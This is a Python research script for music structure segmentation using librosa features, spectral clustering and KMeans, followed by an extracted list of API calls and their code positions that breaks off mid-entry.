def plot_structure(Rf, X, seg_ids, k, onset_times):
fig_s = plt.figure(figsize=(12, 4))
colors = plt.get_cmap('Paired', k)
ax_s1 = fig_s.add_subplot(1, 3, 2)
librosa.display.specshow(Rf, cmap='inferno_r')
ax_s1.set_title('Long-range recurrence similarity (Rrec)')
ax_s2 =fig_s.add_subplot(1, 3, 1)
librosa.display.specshow(X, y_axis='time', y_coords=onset_times)
ax_s2.set_title('Structure components (Eigen vectors)')
ax_s3 = fig_s.add_subplot(1, 3, 3)
librosa.display.specshow(np.atleast_2d(seg_ids).T, cmap=colors)
ax_s3.set_title('Estimated segments')
plt.colorbar(ticks=range(k))
plt.tight_layout()
#################################################
def compute_musical_density(C, onset_times, w, alpha):
N = C.shape[1]
density = []
for n in range(N):
t1 = np.min([onset_times[-1], onset_times[n] + w])
t2 = np.min([onset_times[-1] -w, onset_times[n]])
idw = np.where((onset_times < t1) & (onset_times >= t2))
#if n + w < :
threshold_chroma = np.max(C[:,idw])
#else:
#threshold_chroma = np.mean(C[:, N - w : N])
idx = np.where(C[:,n] > alpha * threshold_chroma)
density.append(len(idx[0]))
return density
def plot_features(X, onsets, onset_times):
Xsync = librosa.util.sync(X, onsets, aggregate=np.median)
#print(X.shape, Xsync.shape)
#print(onset_times)
if params.feat[0] == 'chroma':
fig_c = plt.figure(figsize=(12, 6))
ax0_c = fig_c.add_subplot(3,1,1)
ax0_c.set_title('onset-synchronous chroma (12)')
#ax0_c.pcolor(distance, cmap = 'plasma')
librosa.display.specshow(Xsync[:12,:], y_axis='chroma', x_axis='time', x_coords=onset_times, cmap = 'OrRd')
#plt.colorbar()
ax1_c = fig_c.add_subplot(3,1,2, sharex = ax0_c)
ax1_c.set_title('onset-synchronous delta chroma (12)')
librosa.display.specshow(np.abs(Xsync[12:,:]), y_axis='chroma', x_axis='time', x_coords=onset_times, cmap = 'OrRd')
#plt.colorbar()
density = compute_musical_density(Xsync[:12,:], onset_times, params.norm_density_win, params.alpha)
print(len(onset_times), len(density))
ax2_c = fig_c.add_subplot(3,1,3, sharex = ax0_c)
ax2_c.set_title('musical density')
ax2_c.plot(onset_times, density)
plt.tight_layout()
elif params.feat[0] == 'cepstral':
fig_s = plt.figure(figsize=(12, 6))
ax0_s = fig_s.add_subplot(3,1,1)
ax0_s.set_title('onset-synchronous MFCC (20)')
librosa.display.specshow(Xsync[:21,:], x_axis='time', x_coords=onset_times)
#plt.colorbar()
#plt.tight_layout()
ax1_s = fig_s.add_subplot(3,1,2, sharex = ax0_s)
ax1_s.set_title('onset-synchronous delta MFCC (20)')
librosa.display.specshow(np.abs(Xsync[20:,:]), x_axis='time', x_coords=onset_times)
#plt.colorbar()
density = compute_musical_density(Xsync[:21,:], onset_times, params.norm_density_win, params.alpha)
ax2_s = fig_s.add_subplot(3,1,2, sharex = ax0_s)
ax2_s.set_title('musical density')
ax2_s.plot(onset_times, density)
plt.tight_layout()
else:
print('these parameters can not be plot')
def load_wav_percu(filename, start, duration, opt_percussive_part):
y, sr = librosa.load(filename, offset=start, duration = duration)
if opt_percussive_part:
#separate harmonics and percussives into two wavforms
y_harmo, yo = librosa.effects.hpss(y)
librosa.output.write_wav(filename + '_harmo.wav', y_harmo, sr)
librosa.output.write_wav(filename + '_percu.wav', y_percu, sr)
return yo, sr
else:
return y, sr
################################################
def feature_extraction(y, sr, opt_tuning):
if opt_tuning:
#extraction of tuning
A440 = librosa.estimate_tuning(y=y, sr=sr, resolution=1e-3)
print('Deviation from A440 is : {0:.2f}'.format(A440))
else:
A440 = 0.0
print('Features for local similarity: ', ' '.join(params.feat))
full = []
idx_chroma = 0
if 'cepstral' in params.feat:
mfcc = librosa.feature.mfcc(y=y, sr=sr, n_mfcc = 20, n_fft = NFFT, hop_length = STEP)
mfcc_delta = librosa.feature.delta(mfcc)
fcep = np.concatenate((mfcc, mfcc_delta), axis=0)
full.append(fcep)
if 'chroma' in params.feat:
chroma = librosa.feature.chroma_cqt(y=y, sr=sr, n_chroma = 12, n_octaves = N_OCTAVES, hop_length = STEP, norm = None, tuning= A440)
chroma_delta = librosa.feature.delta(chroma)
fchr = np.concatenate((chroma, chroma_delta), axis=0)
idx_chroma = len(full)
full.append(fchr)
if 'spectral' in params.feat:
centroid = librosa.feature.spectral_centroid(y=y, sr=sr, n_fft = NFFT, hop_length = STEP)
contrast = librosa.feature.spectral_contrast(y=y, sr=sr, n_fft = NFFT, n_bands=6, hop_length = STEP)
flatness = librosa.feature.spectral_flatness(y=y, n_fft = NFFT, hop_length = STEP)
rolloff05 = librosa.feature.spectral_rolloff(y=y, sr= sr, n_fft = NFFT, hop_length = STEP, roll_percent= 0.05)
rolloff25 = librosa.feature.spectral_rolloff(y=y, sr= sr, n_fft = NFFT, hop_length = STEP, roll_percent= 0.25)
rolloff50 = librosa.feature.spectral_rolloff(y=y, sr= sr, n_fft = NFFT, hop_length = STEP, roll_percent= 0.50)
rolloff75 = librosa.feature.spectral_rolloff(y=y, sr= sr, n_fft = NFFT, hop_length = STEP, roll_percent= 0.75)
rolloff95 = librosa.feature.spectral_rolloff(y=y, sr= sr, n_fft = NFFT, hop_length = STEP, roll_percent= 0.95)
spec = np.concatenate((centroid, contrast, flatness, rolloff05,rolloff25,rolloff50,rolloff75,rolloff95), axis=0)
spec_delta = librosa.feature.delta(spec)
fspec = np.concatenate((spec, spec_delta), axis = 0)
full.append(fspec)
full = np.array(full)[0]
print('feature shape', full.shape)
return full, idx_chroma
def extract_time_boundaries(cluster_ids, onsets, nb_frames, sr):
# Locate segment boundaries from the label sequence
bound_beats = 1 + np.flatnonzero(cluster_ids[:-1] != cluster_ids[1:])
# Count beat 0 as a boundary
bound_beats = librosa.util.fix_frames(bound_beats, x_min=0)
# Compute the segment label for each boundary
bound_labels = list(cluster_ids[bound_beats])
# Convert beat indices to frames
bound_frames = onsets[bound_beats]
# Make sure we cover to the end of the track
bound_frames = librosa.util.fix_frames(bound_frames, x_min=None, x_max=nb_frames-1)
bound_times = librosa.frames_to_time(bound_frames, sr=sr, hop_length = STEP)
return bound_times, bound_labels
##################################
def extract_cosine_distance_clusters(center_clusters, distance_ref, type_dist = 'cos'):
distance = []
for center in center_clusters:
if type_dist == 'cos':
distance.append( scipy.spatial.distance.cosine( center, distance_ref) )
elif type_dist == 'eucl':
distance.append(np.sqrt( np.sum( (center - distance_ref)**2) ))
return distance
def extract_distance_between_clusters(center_clusters, type_dist = 'cos'):
distance = np.zeros((center_clusters.shape))
for i, center_i in enumerate(center_clusters):
for j, center_j in enumerate(center_clusters):
if type_dist == 'cos':
distance[i,j] = scipy.spatial.distance.cosine( center_i, center_j)
elif type_dist == 'eucl':
distance[i,j] = np.sqrt( np.sum( (center_i - center_j)**2) )
x = range(i+1)
y = range(j+1)
xloc = [c + 0.5 for c in x]
cx = [str(c) for c in x]
#print(cx)
fig_d, ax_d = plt.subplots(figsize=(5, 4))
p_d = ax_d.pcolor(distance, cmap = 'inferno_r')
cb = fig_d.colorbar(p_d)
ax_d.xaxis.set_ticks(xloc)
ax_d.xaxis.set_ticklabels(cx)
ax_d.yaxis.set_ticks(xloc)
ax_d.yaxis.set_ticklabels(cx)
ax_d.set_title('Distance between clusters')
ax_d.set_xlabel('clusters numbers')
plt.tight_layout()
return distance
def extract_ref_signal(X, onset_times):
ind = np.where((onset_times >= params.begin_ref) & (onset_times < params.end_ref))
return X[ind,:]
def main():
parser = argparse.ArgumentParser(description='Segmentation and clustering of musical sections with spectral clustering (Laplacian matrix and eigen values)')
parser.add_argument('filename', type=str, help='name of audio file')
parser.add_argument('manual_onset', nargs='?', type=str, help='name of the file containing manual annotations for onset timestamps (with method=manual)')
args = parser.parse_args()
#==================
# Signal processing
#==================
#extract waveform from audio signal of given duration and begining. If onset_percu is True, extract only percussive part of the signal.
y, sr = load_wav_percu(args.filename, params.begin, params.duration, params.onset_percu)
print('signal shape:', y.shape, ' sr=', sr, 'win duration=%.2f' %(NFFT / sr))
#extract acoustic feature from audio signal feat is a matrix np.array((nb features, Tmax*sr/STEP))
feat, idx_chroma = feature_extraction(y, sr, params.opt_tuning)
#extract onset indexes and times + onset-synchronous CQT transform on onsets.
onsets, onset_times, Csync = extract_onsets(y, sr, args.manual_onset)
#if 'chroma' in params.feat:
# compute_musical_density(Csync, onset_times, idx_chroma, params.norm_density_win, params.alpha, sr)
if params.plot_features: plot_features(feat, onsets, onset_times)
#================
# Affinity matrix
#================
#compute a non-negative affinity matrix using onset-synchronous CQT (with Gaussian kernel)
#represent local consistency of timbral (CQT) features
Rf = build_weighted_rec_matrix(Csync)
#compute a non-negative affinity matrix using onset-synchronous feature matrix (with Gaussian kernel)
#represent long-range repeating forms of harmonic features
R_path = build_seq_matrix(feat, onsets)
#compute Laplacian (sequence augmented affinity matrix) as a linear combination of Rf and Rpath and extract eigenvalues and vectors.
Cnorm, evals, evecs = build_laplacian_and_evec(Rf, R_path, params.plot_simi, onset_times)
#===========
# Clustering
#===========
#determine number of clusters kl is a list of potential numbers of cluster.
kl = compute_nb_clusters(params.cluster_method, evals, evecs, y.shape[0]*sr)
N_CLUST = len(kl)
#=================
# Start plotting
#=================
import matplotlib.patches as patches
fig_f = plt.figure(figsize = (12, 3+2*N_CLUST))
#fig.subplots_adjust(hspace=.5)
#plot onset-synchronous CQT
hr = [1] * (N_CLUST +1)
hr[0] = 2
gs = gridspec.GridSpec(1 + N_CLUST,1, height_ratios=hr)
ax_f0 = fig_f.add_subplot(gs[0])
librosa.display.specshow(Csync, y_axis='cqt_hz', sr=sr, hop_length = STEP, bins_per_octave=BINS_PER_OCTAVE, x_axis='time', x_coords=onset_times)
#librosa.display.specshow(feat, y_axis='chroma', x_axis='time') #ou
ax_f0.set_title('CQT spectrogram synchronized {0}'.format(params.onset))
for it, k in enumerate(kl):
#limit the number of clusters per second
if k > params.cluster_nb_max*sr*y.shape[0]:
k = params.cluster_nb_max*sr*y.shape[0]
print('nb of clusters: {} for it {}/{}'.format(k, it, N_CLUST))
#for k clusters, use the first k normalized eigenvectors.
#X can be interpretable as an onset-synchronous matrix containing relevant feature information for local and log-range structure segmentation
X = evecs[:, :k] / Cnorm[:, k-1:k]
#onsets are grouped into k clusters, each cluster having its own acoustic characteristics
KM = sklearn.cluster.KMeans(n_clusters=k)
#seg_ids is a np.array((label)) label being a number corresponding to one cluster seg_ids[i] is the label of onset i
seg_ids = KM.fit_predict(X)
#if needed compute the cosine distance between each cluster and a reference taken at the very begining of th signal
#KM.cluster_centers_ : array, [n_clusters, n_features]
if params.cluster_dist:
ref_signal = extract_ref_signal(X, onset_times)
distance_cosine_cluster = extract_cosine_distance_clusters( KM.cluster_centers_, np.mean(X[:10*NFFT,:], axis=0))
else:
distance_cosine_cluster = None
if params.plot_dist:
distance_between_clusters = extract_distance_between_clusters( KM.cluster_centers_ )
# and plot the resulting structure representation
if params.plot_struct: plot_structure(Rf, X, seg_ids, k, onset_times)
bound_times, bound_labels = extract_time_boundaries(seg_ids, onsets, feat.shape[1], sr)
freqs = librosa.cqt_frequencies(n_bins=Csync.shape[0], fmin=librosa.note_to_hz('C1'), bins_per_octave=BINS_PER_OCTAVE)
timestamps_name = os.path.splitext(args.filename)[0] + '_timestamps.txt'
#=============
# Plot results
#=============
cmap = plt.get_cmap('Paired', k)
#write header of text file with parameters.
if params.timestamps:
f = open(timestamps_name, 'a')
f.write('WIN = {0:.2f} sec, NFFT = {1}, STEP = {2}, begin = {3}, duration = {4}\n'.format(NFFT / sr, NFFT, STEP, params.begin, params.duration))
f.write('Nb of clusters: {0} obtained with method {1} and features {2}\n'.format(k, params.cluster_method, '-'.join(params.feat)))
#plot onset-synchronous CQT
#if it == 0:
#plot segmentation and clusters grouping (+ cosine distance.)
#also write obtained boundaries in the text file.
ax_f1 = fig_f.add_subplot(gs[it + 1], sharex = ax_f0)
for interval, label in zip(zip(bound_times, bound_times[1:]), bound_labels):
if params.timestamps: f.write('{0:.2f} \t {1:.2f} \t {2} \n'.format(interval[0], interval[1], label))
if params.cluster_dist: ax_f1.plot([interval[0], interval[1]],[distance_cosine_cluster[label], distance_cosine_cluster[label]], 'k')
ax_f1.add_patch(patches.Rectangle((interval[0], 0), interval[1] - interval[0], 1, facecolor=cmap(label), alpha=1))
ax_f1.text(interval[0]+(interval[1]-interval[0])/2, 0.9, label, fontsize=8)
if params.timestamps: f.close()
#plt.subplots_adjust(hspace=.0)
plt.tight_layout()
plt.show()
if __name__ == '__main__':
main()
title = 'Palestrina'
# Palestrina, AccordsMajeurs, AccordsMineur, Majeur3et4notes, Majeur3et4notes, Accords3Notes, DispoMajeurMineur, Tension
# Cadence3V, Cadence4VMaj, Cadence4Vmin,
audio = load('/Users/manuel/Dropbox (TMG)/Thèse/code/DescripteursHarmoniquesAudio/'+title+'.wav')
main(audio)
|
[
"librosa.feature.spectral_flatness",
"librosa.util.fix_frames",
"librosa.feature.mfcc",
"librosa.estimate_tuning",
"numpy.array",
"numpy.cumsum",
"sys.exit",
"librosa.onset.onset_backtrack",
"librosa.feature.spectral_centroid",
"librosa.feature.spectral_contrast",
"numpy.arange",
"librosa.load",
"numpy.atleast_2d",
"numpy.mean",
"scipy.spatial.distance.cosine",
"argparse.ArgumentParser",
"numpy.where",
"matplotlib.pyplot.plot",
"numpy.flatnonzero",
"numpy.diff",
"numpy.max",
"numpy.exp",
"librosa.frames_to_time",
"matplotlib.gridspec.GridSpec",
"numpy.nanmax",
"numpy.concatenate",
"librosa.display.specshow",
"numpy.linalg.eigh",
"numpy.min",
"librosa.feature.spectral_rolloff",
"numpy.argmin",
"librosa.util.sync",
"librosa.segment.timelag_filter",
"librosa.effects.hpss",
"numpy.abs",
"numpy.allclose",
"librosa.onset.onset_detect",
"librosa.beat.beat_track",
"os.path.splitext",
"numpy.argmax",
"numpy.std",
"matplotlib.pyplot.title",
"librosa.note_to_hz",
"warnings.filterwarnings",
"sklearn.preprocessing.scale",
"matplotlib.pyplot.get_cmap",
"librosa.onset.onset_strength",
"matplotlib.pyplot.show",
"matplotlib.pyplot.legend",
"numpy.median",
"librosa.output.write_wav",
"scipy.sparse.csgraph.laplacian",
"librosa.feature.delta",
"librosa.feature.chroma_cqt",
"numpy.diag",
"librosa.cqt",
"matplotlib.pyplot.rcParams.update",
"librosa.segment.recurrence_matrix",
"numpy.sum",
"numpy.zeros",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.tight_layout",
"scipy.ndimage.median_filter",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.subplots",
"librosa.samples_to_time"
] |
[((1598, 1686), 'warnings.filterwarnings', 'warnings.filterwarnings', ([], {'action': '"""ignore"""', 'module': '"""scipy"""', 'message': '"""^internal gelsd"""'}), "(action='ignore', module='scipy', message=\n '^internal gelsd')\n", (1621, 1686), False, 'import warnings\n'), ((1963, 2000), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'font.size': 8}"], {}), "({'font.size': 8})\n", (1982, 2000), True, 'import matplotlib.pyplot as plt\n'), ((2216, 2256), 'librosa.onset.onset_strength', 'librosa.onset.onset_strength', ([], {'S': 'M', 'sr': 'sr'}), '(S=M, sr=sr)\n', (2244, 2256), False, 'import librosa\n'), ((2308, 2372), 'librosa.onset.onset_detect', 'librosa.onset.onset_detect', ([], {'onset_envelope': 'oenv', 'backtrack': '(False)'}), '(onset_envelope=oenv, backtrack=False)\n', (2334, 2372), False, 'import librosa\n'), ((2435, 2481), 'librosa.onset.onset_backtrack', 'librosa.onset.onset_backtrack', (['onset_raw', 'oenv'], {}), '(onset_raw, oenv)\n', (2464, 2481), False, 'import librosa\n'), ((2573, 2638), 'librosa.util.fix_frames', 'librosa.util.fix_frames', (['onset_raw'], {'x_min': '(0)', 'x_max': '(M.shape[1] - 1)'}), '(onset_raw, x_min=0, x_max=M.shape[1] - 1)\n', (2596, 2638), False, 'import librosa\n'), ((2652, 2712), 'librosa.frames_to_time', 'librosa.frames_to_time', (['onset_frames'], {'sr': 'sr', 'hop_length': 'STEP'}), '(onset_frames, sr=sr, hop_length=STEP)\n', (2674, 2712), False, 'import librosa\n'), ((2784, 2836), 'librosa.util.sync', 'librosa.util.sync', (['M', 'onset_raw'], {'aggregate': 'np.median'}), '(M, onset_raw, aggregate=np.median)\n', (2801, 2836), False, 'import librosa\n'), ((3701, 3765), 'librosa.beat.beat_track', 'librosa.beat.beat_track', ([], {'y': 'y', 'sr': 'sr', 'hop_length': 'STEP', 'trim': '(False)'}), '(y=y, sr=sr, hop_length=STEP, trim=False)\n', (3724, 3765), False, 'import librosa\n'), ((4033, 4094), 'librosa.util.fix_frames', 'librosa.util.fix_frames', (['beats'], {'x_min': '(0)', 'x_max': '(M.shape[1] - 1)'}), '(beats, x_min=0, x_max=M.shape[1] - 1)\n', (4056, 4094), False, 'import librosa\n'), ((4107, 4167), 'librosa.frames_to_time', 'librosa.frames_to_time', (['beats_frames'], {'sr': 'sr', 'hop_length': 'STEP'}), '(beats_frames, sr=sr, hop_length=STEP)\n', (4129, 4167), False, 'import librosa\n'), ((4180, 4235), 'librosa.util.sync', 'librosa.util.sync', (['M', 'beats_frames'], {'aggregate': 'np.median'}), '(M, beats_frames, aggregate=np.median)\n', (4197, 4235), False, 'import librosa\n'), ((4956, 4980), 'numpy.arange', 'np.arange', (['(0)', 'M.shape[1]'], {}), '(0, M.shape[1])\n', (4965, 4980), True, 'import numpy as np\n'), ((4996, 5041), 'librosa.samples_to_time', 'librosa.samples_to_time', (['onsets'], {'sr': '(sr / STEP)'}), '(onsets, sr=sr / STEP)\n', (5019, 5041), False, 'import librosa\n'), ((5520, 5582), 'librosa.util.fix_frames', 'librosa.util.fix_frames', (['frames'], {'x_min': '(0)', 'x_max': '(M.shape[1] - 1)'}), '(frames, x_min=0, x_max=M.shape[1] - 1)\n', (5543, 5582), False, 'import librosa\n'), ((5596, 5650), 'librosa.frames_to_time', 'librosa.frames_to_time', (['onsets'], {'sr': 'sr', 'hop_length': 'STEP'}), '(onsets, sr=sr, hop_length=STEP)\n', (5618, 5650), False, 'import librosa\n'), ((5663, 5712), 'librosa.util.sync', 'librosa.util.sync', (['M', 'onsets'], {'aggregate': 'np.median'}), '(M, onsets, aggregate=np.median)\n', (5680, 5712), False, 'import librosa\n'), ((7478, 7550), 'librosa.segment.recurrence_matrix', 'librosa.segment.recurrence_matrix', (['M'], {'width': '(3)', 'mode': '"""affinity"""', 'sym': '(True)'}), "(M, width=3, mode='affinity', sym=True)\n", (7511, 7550), False, 'import librosa\n'), ((7599, 7658), 'librosa.segment.timelag_filter', 'librosa.segment.timelag_filter', (['scipy.ndimage.median_filter'], {}), '(scipy.ndimage.median_filter)\n', (7629, 7658), False, 'import librosa\n'), ((7883, 7927), 'librosa.util.sync', 'librosa.util.sync', (['M', 'x'], {'aggregate': 'np.median'}), '(M, x, aggregate=np.median)\n', (7900, 7927), False, 'import librosa\n'), ((8028, 8040), 'sklearn.preprocessing.scale', 'scale', (['Msync'], {}), '(Msync)\n', (8033, 8040), False, 'from sklearn.preprocessing import scale\n'), ((8200, 8224), 'numpy.median', 'np.median', (['path_distance'], {}), '(path_distance)\n', (8209, 8224), True, 'import numpy as np\n'), ((8237, 8267), 'numpy.exp', 'np.exp', (['(-path_distance / sigma)'], {}), '(-path_distance / sigma)\n', (8243, 8267), True, 'import numpy as np\n'), ((8607, 8629), 'numpy.sum', 'np.sum', (['R_path'], {'axis': '(1)'}), '(R_path, axis=1)\n', (8613, 8629), True, 'import numpy as np\n'), ((8641, 8659), 'numpy.sum', 'np.sum', (['Rf'], {'axis': '(1)'}), '(Rf, axis=1)\n', (8647, 8659), True, 'import numpy as np\n'), ((8945, 8991), 'scipy.sparse.csgraph.laplacian', 'scipy.sparse.csgraph.laplacian', (['A'], {'normed': '(True)'}), '(A, normed=True)\n', (8975, 8991), False, 'import scipy\n'), ((9106, 9123), 'numpy.linalg.eigh', 'np.linalg.eigh', (['L'], {}), '(L)\n', (9120, 9123), True, 'import numpy as np\n'), ((9267, 9314), 'scipy.ndimage.median_filter', 'scipy.ndimage.median_filter', (['evecs'], {'size': '(9, 1)'}), '(evecs, size=(9, 1))\n', (9294, 9314), False, 'import scipy\n'), ((12099, 12117), 'numpy.zeros', 'np.zeros', (['n_labels'], {}), '(n_labels)\n', (12107, 12117), True, 'import numpy as np\n'), ((12786, 12813), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 4)'}), '(figsize=(12, 4))\n', (12796, 12813), True, 'import matplotlib.pyplot as plt\n'), ((12815, 12835), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(3)', '(1)'], {}), '(1, 3, 1)\n', (12826, 12835), True, 'import matplotlib.pyplot as plt\n'), ((12837, 12925), 'librosa.display.specshow', 'librosa.display.specshow', (['Rf'], {'cmap': '"""inferno_r"""', 'y_axis': '"""time"""', 'y_coords': 'onset_times'}), "(Rf, cmap='inferno_r', y_axis='time', y_coords=\n onset_times)\n", (12861, 12925), False, 'import librosa\n'), ((12922, 12974), 'matplotlib.pyplot.title', 'plt.title', (['"""Long-range recurrence similarity (Rrec)"""'], {}), "('Long-range recurrence similarity (Rrec)')\n", (12931, 12974), True, 'import matplotlib.pyplot as plt\n'), ((12976, 12996), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(3)', '(2)'], {}), '(1, 3, 2)\n', (12987, 12996), True, 'import matplotlib.pyplot as plt\n'), ((12998, 13048), 'librosa.display.specshow', 'librosa.display.specshow', (['R_path'], {'cmap': '"""inferno_r"""'}), "(R_path, cmap='inferno_r')\n", (13022, 13048), False, 'import librosa\n'), ((13050, 13091), 'matplotlib.pyplot.title', 'plt.title', (['"""Local path similarity (Rloc)"""'], {}), "('Local path similarity (Rloc)')\n", (13059, 13091), True, 'import matplotlib.pyplot as plt\n'), ((13093, 13113), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(3)', '(3)'], {}), '(1, 3, 3)\n', (13104, 13113), True, 'import matplotlib.pyplot as plt\n'), ((13115, 13160), 'librosa.display.specshow', 'librosa.display.specshow', (['A'], {'cmap': '"""inferno_r"""'}), "(A, cmap='inferno_r')\n", (13139, 13160), False, 'import librosa\n'), ((13162, 13215), 'matplotlib.pyplot.title', 'plt.title', (['"""Combined graph (A = m Rrec + (1-m) Rloc)"""'], {}), "('Combined graph (A = m Rrec + (1-m) Rloc)')\n", (13171, 13215), True, 'import matplotlib.pyplot as plt\n'), ((13217, 13235), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (13233, 13235), True, 'import matplotlib.pyplot as plt\n'), ((13301, 13328), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 4)'}), '(figsize=(12, 4))\n', (13311, 13328), True, 'import matplotlib.pyplot as plt\n'), ((13339, 13364), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""Paired"""', 'k'], {}), "('Paired', k)\n", (13351, 13364), True, 'import matplotlib.pyplot as plt\n'), ((13403, 13449), 'librosa.display.specshow', 'librosa.display.specshow', (['Rf'], {'cmap': '"""inferno_r"""'}), "(Rf, cmap='inferno_r')\n", (13427, 13449), False, 'import librosa\n'), ((13546, 13610), 'librosa.display.specshow', 'librosa.display.specshow', (['X'], {'y_axis': '"""time"""', 'y_coords': 'onset_times'}), "(X, y_axis='time', y_coords=onset_times)\n", (13570, 13610), False, 'import librosa\n'), ((13839, 13857), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (13855, 13857), True, 'import matplotlib.pyplot as plt\n'), ((14445, 14494), 'librosa.util.sync', 'librosa.util.sync', (['X', 'onsets'], {'aggregate': 'np.median'}), '(X, onsets, aggregate=np.median)\n', (14462, 14494), False, 'import librosa\n'), ((16273, 16328), 'librosa.load', 'librosa.load', (['filename'], {'offset': 'start', 'duration': 'duration'}), '(filename, offset=start, duration=duration)\n', (16285, 16328), False, 'import librosa\n'), ((18975, 19020), 'librosa.util.fix_frames', 'librosa.util.fix_frames', (['bound_beats'], {'x_min': '(0)'}), '(bound_beats, x_min=0)\n', (18998, 19020), False, 'import librosa\n'), ((19250, 19320), 'librosa.util.fix_frames', 'librosa.util.fix_frames', (['bound_frames'], {'x_min': 'None', 'x_max': '(nb_frames - 1)'}), '(bound_frames, x_min=None, x_max=nb_frames - 1)\n', (19273, 19320), False, 'import librosa\n'), ((19335, 19395), 'librosa.frames_to_time', 'librosa.frames_to_time', (['bound_frames'], {'sr': 'sr', 'hop_length': 'STEP'}), '(bound_frames, sr=sr, hop_length=STEP)\n', (19357, 19395), False, 'import librosa\n'), ((19909, 19940), 'numpy.zeros', 'np.zeros', (['center_clusters.shape'], {}), '(center_clusters.shape)\n', (19917, 19940), True, 'import numpy as np\n'), ((20347, 20375), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(5, 4)'}), '(figsize=(5, 4))\n', (20359, 20375), True, 'import matplotlib.pyplot as plt\n'), ((20652, 20670), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (20668, 20670), True, 'import matplotlib.pyplot as plt\n'), ((20739, 20815), 'numpy.where', 'np.where', (['((onset_times >= params.begin_ref) & (onset_times < params.end_ref))'], {}), '((onset_times >= params.begin_ref) & (onset_times < params.end_ref))\n', (20747, 20815), True, 'import numpy as np\n'), ((20860, 21017), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Segmentation and clustering of musical sections with spectral clustering (Laplacian matrix and eigen values)"""'}), "(description=\n 'Segmentation and clustering of musical sections with spectral clustering (Laplacian matrix and eigen values)'\n )\n", (20883, 21017), False, 'import argparse\n'), ((23154, 23195), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 3 + 2 * N_CLUST)'}), '(figsize=(12, 3 + 2 * N_CLUST))\n', (23164, 23195), True, 'import matplotlib.pyplot as plt\n'), ((23299, 23350), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (['(1 + N_CLUST)', '(1)'], {'height_ratios': 'hr'}), '(1 + N_CLUST, 1, height_ratios=hr)\n', (23316, 23350), False, 'from matplotlib import gridspec\n'), ((23385, 23531), 'librosa.display.specshow', 'librosa.display.specshow', (['Csync'], {'y_axis': '"""cqt_hz"""', 'sr': 'sr', 'hop_length': 'STEP', 'bins_per_octave': 'BINS_PER_OCTAVE', 'x_axis': '"""time"""', 'x_coords': 'onset_times'}), "(Csync, y_axis='cqt_hz', sr=sr, hop_length=STEP,\n bins_per_octave=BINS_PER_OCTAVE, x_axis='time', x_coords=onset_times)\n", (23409, 23531), False, 'import librosa\n'), ((26648, 26666), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (26664, 26666), True, 'import matplotlib.pyplot as plt\n'), ((26668, 26678), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (26676, 26678), True, 'import matplotlib.pyplot as plt\n'), ((2863, 2890), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 4)'}), '(figsize=(12, 4))\n', (2873, 2890), True, 'import matplotlib.pyplot as plt\n'), ((2893, 2931), 'matplotlib.pyplot.plot', 'plt.plot', (['oenv'], {'label': '"""Onset strength"""'}), "(oenv, label='Onset strength')\n", (2901, 2931), True, 'import matplotlib.pyplot as plt\n'), ((3063, 3104), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'frameon': '(True)', 'framealpha': '(0.75)'}), '(frameon=True, framealpha=0.75)\n', (3073, 3104), True, 'import matplotlib.pyplot as plt\n'), ((3107, 3125), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3123, 3125), True, 'import matplotlib.pyplot as plt\n'), ((3129, 3156), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 4)'}), '(figsize=(12, 4))\n', (3139, 3156), True, 'import matplotlib.pyplot as plt\n'), ((3159, 3179), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(1)'], {}), '(2, 1, 1)\n', (3170, 3179), True, 'import matplotlib.pyplot as plt\n'), ((3180, 3208), 'matplotlib.pyplot.title', 'plt.title', (['"""CQT spectrogram"""'], {}), "('CQT spectrogram')\n", (3189, 3208), True, 'import matplotlib.pyplot as plt\n'), ((3211, 3331), 'librosa.display.specshow', 'librosa.display.specshow', (['M'], {'y_axis': '"""cqt_hz"""', 'sr': 'sr', 'hop_length': 'STEP', 'bins_per_octave': 'BINS_PER_OCTAVE', 'x_axis': '"""time"""'}), "(M, y_axis='cqt_hz', sr=sr, hop_length=STEP,\n bins_per_octave=BINS_PER_OCTAVE, x_axis='time')\n", (3235, 3331), False, 'import librosa\n'), ((3331, 3349), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3347, 3349), True, 'import matplotlib.pyplot as plt\n'), ((3353, 3373), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(2)', '(1)', '(2)'], {}), '(2, 1, 2)\n', (3364, 3373), True, 'import matplotlib.pyplot as plt\n'), ((3374, 3425), 'matplotlib.pyplot.title', 'plt.title', (['"""CQT spectrogram synchronized on onsets"""'], {}), "('CQT spectrogram synchronized on onsets')\n", (3383, 3425), True, 'import matplotlib.pyplot as plt\n'), ((3428, 3551), 'librosa.display.specshow', 'librosa.display.specshow', (['Msync'], {'bins_per_octave': 'BINS_PER_OCTAVE', 'y_axis': '"""cqt_hz"""', 'x_axis': '"""time"""', 'x_coords': 'onset_times'}), "(Msync, bins_per_octave=BINS_PER_OCTAVE, y_axis=\n 'cqt_hz', x_axis='time', x_coords=onset_times)\n", (3452, 3551), False, 'import librosa\n'), ((3549, 3567), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', 